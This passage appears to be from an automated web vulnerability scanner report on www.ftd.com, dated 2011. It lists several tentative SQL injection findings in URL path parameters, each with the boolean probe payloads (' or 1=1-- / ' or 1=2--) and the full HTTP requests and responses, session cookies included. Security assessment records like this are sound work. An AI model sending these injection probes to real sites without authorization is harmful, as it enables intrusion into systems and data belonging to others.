       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       w
...[SNIP]...

1.13. http://www.ftd.com/351/favicon.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 16543645'%20or%201%3d1--%20 and 16543645'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35116543645'%20or%201%3d1--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:14:56 GMT
X-Varnish: 750185848
Age: 14
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 750185848</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35116543645'%20or%201%3d2--%20/favicon.ico HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:14:57 GMT
X-Varnish: 750186654
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.14. http://www.ftd.com/351/favicon.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/favicon.ico

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 11294463'%20or%201%3d1--%20 and 11294463'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/favicon.ico11294463'%20or%201%3d1--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:16:47 GMT
X-Varnish: 540364982
Age: 16
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 540364982</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/favicon.ico11294463'%20or%201%3d2--%20 HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926; mbcc=405EE1C0-ED35-5D1B-903A-21AA598AE3E3; mbcs=544E1284-8127-56AF-A20F-90F1DFEB835D; s_vi=[CS]v1|26E39E5A851D17D3-60000106401BCEE7[CE]; foresee.analytics=%7B%22rr_domain%22%3A%22ftd.com%22%2C%22rr_version%22%3A12%2C%22rr_group_id%22%3A%221304902842245_1861%22%7D; fsr.a=1304902868631

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123189
Date: Mon, 09 May 2011 01:16:48 GMT
X-Varnish: 540365912
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.15. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 10658399'%20or%201%3d1--%20 and 10658399'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /35110658399'%20or%201%3d1--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 729990668
Age: 21
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729990668</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /35110658399'%20or%201%3d2--%20/v20110407/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:08:14 GMT
X-Varnish: 540338180
Age: 0
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.16. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 92130663'%20or%201%3d1--%20 and 92130663'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v2011040792130663'%20or%201%3d1--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:10:21 GMT
X-Varnish: 729997969
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 729997969</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v2011040792130663'%20or%201%3d2--%20/ftd.css?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:10:23 GMT
X-Varnish: 729998810
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.17. http://www.ftd.com/351/v20110407/ftd.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /351/v20110407/ftd.css

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads 31033777'%20or%201%3d1--%20 and 31033777'%20or%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /351/v20110407/ftd.css31033777'%20or%201%3d1--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:12:16 GMT
X-Varnish: 730004563
Age: 15
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 730004563</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /351/v20110407/ftd.css31033777'%20or%201%3d2--%20?markcode=351&design2007=1&design_apr2008=1&popup= HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c1=%7B%22referrer_before_redirect%22%3A%22%22%7D; TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; fsr.a=1304902825762; markcode=351

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
X-VR-Note: gzip-me
Set-Cookie: s.events=0; domain=.ftd.com; path=/; expires=Thu, 22 Mar 1978 05:00:00 GMT
Content-Type: text/html
Content-Length: 123303
Date: Mon, 09 May 2011 01:12:17 GMT
X-Varnish: 750176867
Age: 1
Via: 1.1 varnish
Connection: keep-alive



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml"
xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
<head>

<link rel="icon" href="http://www.ftd.com/350/favicon.ico" type="image/x-icon" />



   <script language="javascript" type="text/javascript">
   <!--
       var cookie_domain = ".ftd.com";
       // because we modify the document.domain and we have some javascript
       // that references document.domain but expects it to be our actual full domain
       // we save it before we use it.
       var our_domain = document.domain;
       var imageurl = "http://www.ftdimg.com";
       var markcode = "350";
       var js_debug = 0;
       var secure_url = "https://ordering.ftd.com";
       var nonsecure_url = "http://www.ftd.com";
       var seo_urls = 1;
       var isfsenabled = 1;
var isFlorist = 0;
       document.domain = "ftd.com";
   //-->
   </script>


   <script language="javascript" src="http://www.ftdimg.com/v20110407/js/compressed.js"></script>
       <script language="javascript" type="text/javascript">
   <!--
       // we are going to set up a window onerror function
       // this will call our regular try/catch error function
       // this doesn't mean you shouldn't do try/catch blocks, try/catch blocks
       // are actually better then using the window.onerror event.
       try    {
       // now we re-set our onerror function now that errAlert has been defined
       window.onerror=function(message, url, lineNumber) {
        // build our error message from what the onerror event sends us
        var msg = "This error was not in a try/catch block.";
           msg +="\nThe e
...[SNIP]...

1.18. http://www.ftd.com/empty/index.epl [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.ftd.com
Path:   /empty/index.epl

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 73558935'%20or%201%3d1--%20 and 73558935'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /empty73558935'%20or%201%3d1--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 1

HTTP/1.1 503 Service Unavailable
Server: Varnish
Retry-After: 0
Content-Type: text/html; charset=utf-8
Content-Length: 418
Date: Mon, 09 May 2011 01:01:20 GMT
X-Varnish: 869409209
Age: 10
Via: 1.1 varnish
Connection: close


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>503 Service Unavailable</title>
</head>
<body>
<h1>Error 503 Service Unavailable</h1>
<p>Service Unavailable</p>
<h3>Guru Meditation:</h3>
<p>XID: 869409209</p>
<hr>
<p>Varnish cache server</p>
</body>
</html>

Request 2

GET /empty73558935'%20or%201%3d2--%20/index.epl HTTP/1.1
Host: www.ftd.com
Proxy-Connection: keep-alive
Referer: http://www.ftd.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=B5E9452E79D710790019CAE77C984B85; TLTUID=B5E9452E79D710790019CAE77C984B85; markcode=351; v_id=82914762190364346423402455244690; s_id=68151206806989154919581810926832; fsr.a=1304902834223; c1=%7B%22continue_shopping%22%3A%22%7B%5C%22name%5C%22%3A%5C%22Home%20Page%5C%22%2C%5C%22type%5C%22%3A%5C%22home%5C%22%2C%5C%22value%5C%22%3A%5C%22%252F%253Fmarkcode%253D351%5C%22%7D%22%7D; s_cc=true; si_path=1304902834891; bcp_path=1304902834891; scp_path=1304902834891; pp_path=1304902834891; s_sq=%5B%5BB%5D%5D; last_active=1304902834926

Response 2

HTTP/1.1 404 Not Found
Server: Apache
Vary: Accept-Encoding
P3P: CP="STA CUR TAI"
X-Accelerator-Vary: Accept-Encoding
